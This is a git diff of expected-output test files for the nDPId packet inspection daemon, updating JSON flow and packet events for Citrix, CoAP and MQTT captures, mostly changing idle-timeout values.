+00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="} 
+00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} 00545{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":5490,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1605} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 
diff --git a/test/results/coap_mqtt.pcap.out b/test/results/coap_mqtt.pcap.out index 2579ea9ae..5ce90f3de 100644 --- a/test/results/coap_mqtt.pcap.out +++ b/test/results/coap_mqtt.pcap.out 
@@ -38,32 +38,32 @@ 00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1375090935293,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1375091005616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375091005616,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAfsCNAAZUjt3N0b3JhZ2UKbXlyZXNvdXJjZQ=="} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-data-len":436,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1455907243976} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"} 
00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
